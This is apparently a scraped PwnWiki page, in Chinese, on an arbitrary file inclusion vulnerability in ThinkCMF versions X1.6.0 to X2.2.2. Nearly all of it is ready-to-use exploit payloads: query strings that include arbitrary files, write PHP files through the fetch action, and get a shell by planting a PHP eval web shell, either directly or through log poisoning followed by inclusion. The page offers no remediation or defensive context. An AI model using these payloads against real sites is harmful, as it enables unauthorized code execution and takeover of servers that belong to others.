ThinkCMF框架任意文件包含漏洞

影響版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2

Payload

?a=display&templateFile=README.md

Payload (文件寫入)

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php phpinfo(); ?>')</php>

Getshell

?a=display&templateFile=<?php file_put_contents('shell.php','<?php+eval($_POST["6666"]);?>');die();?>

http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log

http://target.domain/?a=display&templateFile=<?php eval($_POST["6666"]);?>


http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log

Anonymous

Search

ThinkCMF框架任意文件包含漏洞

Namespaces

More

Page actions

Contents

影響版本

Payload

Payload (文件寫入)

Getshell

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

ThinkCMF框架 任意文件包含漏洞

影響版本

Payload

Payload (文件寫入)

Getshell

Navigation

Wiki tools

Page tools

ThinkCMF框架任意文件包含漏洞